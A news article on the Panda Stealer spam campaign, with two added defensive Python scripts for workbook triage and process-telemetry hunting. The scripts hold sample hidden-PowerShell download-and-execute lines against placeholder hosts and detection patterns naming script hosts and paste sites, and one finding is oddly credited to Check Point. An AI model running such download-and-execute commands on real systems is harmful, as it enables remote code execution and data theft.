Malware Spread Through Spam Email Campaign
Researchers at Trend Micro have uncovered a new cryptocurrency stealer variant that uses a fileless technique in its global spam email distribution campaign to evade detection.
The gang behind the malware, dubbed "Panda Stealer," starts with emails that appear to be business quote requests to lure recipients into opening malicious Excel files, Trend Micro says.
Researchers found that the malware, a modification of Collector Stealer, has targeted victims in the U.S., Australia, Japan and Germany.
Infection Chains
Trend Micro identified two infection chains. One uses an .XLSM attachment containing macros that download a loader, which then downloads and executes the main stealer.
The second infection chain involves an attached .XLS file containing an Excel formula that uses a PowerShell command to access paste.ee, a Pastebin alternative, which in turn retrieves a second, encrypted PowerShell command.
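Both chains start from an Excel attachment, so a defender's first triage step is static: does the workbook carry a VBA project, and do any of its cell or macro-sheet formulas shell out to PowerShell or reach a paste site? The script below is an added example written for this article, not Trend Micro's tooling. It handles the Office Open XML container (.xlsx/.xlsm, which is a zip archive) rather than the legacy binary .XLS format, and the sample workbook it inspects is constructed in memory with a placeholder formula and a `.invalid` hostname, so nothing on the page's indicator list is used.

```python
"""Static triage of an Office Open XML workbook for macro and formula lures.

Added example (not from the Trend Micro report). Checks two things:
  1. presence of xl/vbaProject.bin, the container for VBA macros in .xlsm
  2. <f> (formula) elements in worksheets or Excel 4.0 macro sheets whose
     text invokes a script host or references a paste site
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SHEET_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"

# Formula substrings worth analyst attention; tune for your environment.
SUSPICIOUS_FORMULA = re.compile(
    r"(powershell|pwsh|cmd(\.exe)?\b|mshta|wscript|paste\.ee|pastebin|"
    r"\bEXEC\(|\bCALL\(|\bREGISTER\()",
    re.IGNORECASE,
)

# Constructed placeholder lure formula; the host is deliberately .invalid.
SAMPLE_FORMULA = (
    'EXEC("powershell -w hidden -c "'
    '"IEX (New-Object Net.WebClient).DownloadString('
    "'https://paste.example.invalid/PLACEHOLDER')\")"
)


def triage_workbook(data: bytes) -> dict:
    """Return findings for one workbook given its raw bytes."""
    findings = {"has_vba_project": False, "suspicious_formulas": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        findings["has_vba_project"] = any(
            n.lower() == "xl/vbaproject.bin" for n in names
        )
        for n in names:
            # Worksheets and XLM macro sheets both store formulas in <f>
            if not n.endswith(".xml"):
                continue
            if not (n.startswith("xl/worksheets/") or n.startswith("xl/macrosheets/")):
                continue
            root = ET.fromstring(zf.read(n))
            for el in root.iter():
                if el.tag == "f" or el.tag.endswith("}f"):
                    text = el.text or ""
                    if SUSPICIOUS_FORMULA.search(text):
                        findings["suspicious_formulas"].append((n, text))
    return findings


def build_sample_workbook(with_vba: bool, formula: str) -> bytes:
    """Construct a minimal workbook in memory (demonstration only, not a real lure)."""
    sheet_xml = (
        f'<worksheet xmlns="{SHEET_NS}"><sheetData><row r="1">'
        f'<c r="A1"><f>{escape(formula)}</f><v>0</v></c>'
        "</row></sheetData></worksheet>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/worksheets/sheet1.xml", sheet_xml)
        if with_vba:
            # Placeholder bytes standing in for an OLE-wrapped VBA project
            zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for label, wb in [
        ("macro + formula lure", build_sample_workbook(True, SAMPLE_FORMULA)),
        ("formula lure only", build_sample_workbook(False, SAMPLE_FORMULA)),
        ("benign", build_sample_workbook(False, "SUM(A1:A3)")),
    ]:
        print(label, triage_workbook(wb))
```

A hit on either check is a reason to detonate the file in a sandbox rather than open it; a clean result is not proof of safety, since legacy .XLS lures and obfuscated formulas fall outside what this scan sees.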
"Decoding these PowerShell scripts revealed that they're used to access paste.ee URLs for easy implementation of fileless payloads. The CallByName export function in Visual Basic is used to call the loading of a .NET assembly within memory from a paste.ee URL. The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL," according to the Trend Micro researchers.
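The chain quoted above leaves a recognisable trail in process-creation telemetry: an Office application spawning a script host, a script host whose command line reaches a paste site, and MSBuild.exe started by something that is not build tooling. The rules below are an added example written for this article, not Trend Micro's detection content. They run over constructed Sysmon-style events whose paths and user names are placeholders; the assumption that the hollowed MSBuild.exe appears with EXCEL.EXE as its parent follows from the in-memory .NET load happening inside the Excel process, and the list of expected MSBuild parents is a starting point to tune for your own fleet.

```python
"""Hunting rules for the Excel -> PowerShell -> paste site -> MSBuild.exe chain.

Added example, not from the Trend Micro report. Events mimic the fields of a
process-creation record (Sysmon Event ID 1: Image, ParentImage, CommandLine).
"""
from __future__ import annotations
from dataclasses import dataclass

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
PASTE_SITES = ("paste.ee", "pastebin.com")
# Assumption: parents from which MSBuild.exe is normal on a developer box.
EXPECTED_MSBUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event trips (empty if none)."""
    hits: list[str] = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    cmd = ev.command_line.lower()
    # Rule 1: Office spawning a script host (first stage of both chains)
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # Rule 2: script host reaching a paste site (fetching the next stage)
    if image in SCRIPT_HOSTS and any(site in cmd for site in PASTE_SITES):
        hits.append("script_host_fetches_paste_site")
    # Rule 3: MSBuild.exe (the hollowing target) with a non-build parent
    if image == "msbuild.exe" and parent not in EXPECTED_MSBUILD_PARENTS:
        hits.append("msbuild_unexpected_parent")
    return hits


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> tripped rules, for events that trip at least one."""
    return {i: h for i, e in enumerate(events) if (h := evaluate(e))}


# Constructed sample telemetry (placeholder paths; the paste path is not real).
SAMPLE_EVENTS = [
    ProcEvent(
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "powershell -w hidden -c IEX (New-Object Net.WebClient)"
        ".DownloadString('https://paste.ee/r/PLACEHOLDER')",
    ),
    ProcEvent(
        r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
        r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "MSBuild.exe",
    ),
    ProcEvent(  # legitimate build from Visual Studio
        r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
        r"C:\Program Files\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe",
        "MSBuild.exe /nologo /p:Configuration=Release app.csproj",
    ),
    ProcEvent(  # an admin running PowerShell from the shell
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"C:\Windows\explorer.exe",
        "powershell Get-Process",
    ),
]


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

Rule 3 is the one that survives obfuscation of the earlier stages: whatever the loader looks like, the hollowed host process is still a legitimate MSBuild.exe image that has no business being launched from Excel.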
Stealing Data
Once it is installed on a device, Panda Stealer can collect private keys and records of past transactions from victims' digital currency wallets, including Dash, Bytecoin, Litecoin and Ethereum.
"Not only does it target cryptocurrency wallets, it can steal credentials from other applications, such as NordVPN, Telegram, Discord chat app and Steam," the researchers note. "It's also capable of taking screenshots of the infected computer and exfiltrating data from browsers, like cookies, passwords and cards."
After stealing information, the malware stores the stolen data in a %TEMP% folder under random file names. The files are then sent to a command-and-control server. Further analysis of the C2 revealed a login page for "Panda Stealer," Check Point reports.
"But more domains were identified with the same login page," the researchers say. "Another 14 victims were discovered from the logs of one of these servers. Another 264 files similar to Panda Stealer were found on VirusTotal. More than 140 C2 servers and over 10 download sites were used by these samples."
Some of the download sites were on Discord, researchers say. They report that these contain files with names such as "build.exe," indicating that threat actors may be using Discord to share the Panda Stealer build.
Trend Micro researchers identified an IP address that the attackers apparently used.
"We believe that this address is assigned to a virtual private server rented from Shock Hosting, which the actor infected for testing purposes," the researchers note. "The VPS may be paid for using cryptocurrency to avoid being traced and uses the web service Cassandra Crypter. We have reported this to Shock Hosting, and they confirmed that the server assigned to this IP address has been suspended."
Researchers also discovered an infected device with a history of visiting a Google Drive link, which is also mentioned in a discussion about the AZORult log extractor on an underground forum.
"The same link and unique cookie were observed on both the log dumps and the forum, therefore the user who posted on the forum must also have access to that log file," the researchers note.
A Variant of Collector Stealer
Trend Micro says that Panda Stealer is a variant of Collector Stealer, which is sold on some underground forums and a Telegram channel. Collector Stealer has been cracked by a Russian threat actor called NCP, also known as su1c1de, the researchers say.
"Comparing the compiled executables of the cracked Collector Stealer and Panda Stealer reveals that the two behave similarly, but have different C2 URLs, build tags, and execution folders," Trend Micro reports. "Like Panda Stealer, Collector Stealer exfiltrates information such as cookies, login data, and web data from a compromised computer, storing them in an SQLite3 database. It also covers its tracks by deleting its stolen files and activity logs after its execution."
A Collector Stealer builder is openly available online, and it can be used to create a customized version, the researchers say.
"Threat actors may also boost their malware campaigns with specific features from Collector Stealer. We have also discovered that Panda Stealer has an infection chain that uses the same fileless distribution method as the 'Fair' variant of Phobos ransomware to carry out memory-based attacks, making it harder for security tools to spot," the researchers note.